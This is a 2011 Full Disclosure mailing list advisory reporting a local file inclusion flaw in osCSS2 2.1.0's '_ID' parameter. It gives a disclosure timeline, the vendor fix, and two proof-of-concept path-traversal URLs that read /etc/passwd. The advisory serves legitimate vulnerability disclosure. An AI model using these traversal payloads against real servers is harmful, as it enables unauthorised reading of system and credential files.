Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

osCSS2 "_ID" parameter Local file inclusion
From: "SSchurtz () t-online de" <SSchurtz () t-online de>
Date: Wed, 09 Nov 2011 12:34:38 +0100

Advisory:               osCSS2 "_ID" parameter Local file inclusion
Advisory ID:            SSCHADV2011-034
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on osCSS2 2.1.0 (latest
version)
Vendor URL:             http://oscss.org/
Vendor Status:          Fixed in svn branche 2.1.0 and reported in develop
version 2.1.1

==========================
Vulnerability Description
==========================

osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability

==================
PoC-Exploit
==================

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd

=========
Solution
=========

Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

====================
Disclosure Timeline
====================

08-Nov-2011 - informed vendor
08-Nov-2011 - release date of this security advisory
08-Nov-2011 - fixed by vendor
08-Nov-2011 - post on BugTraq

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • osCSS2 "_ID" parameter Local file inclusion SSchurtz () t-online de (Nov 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]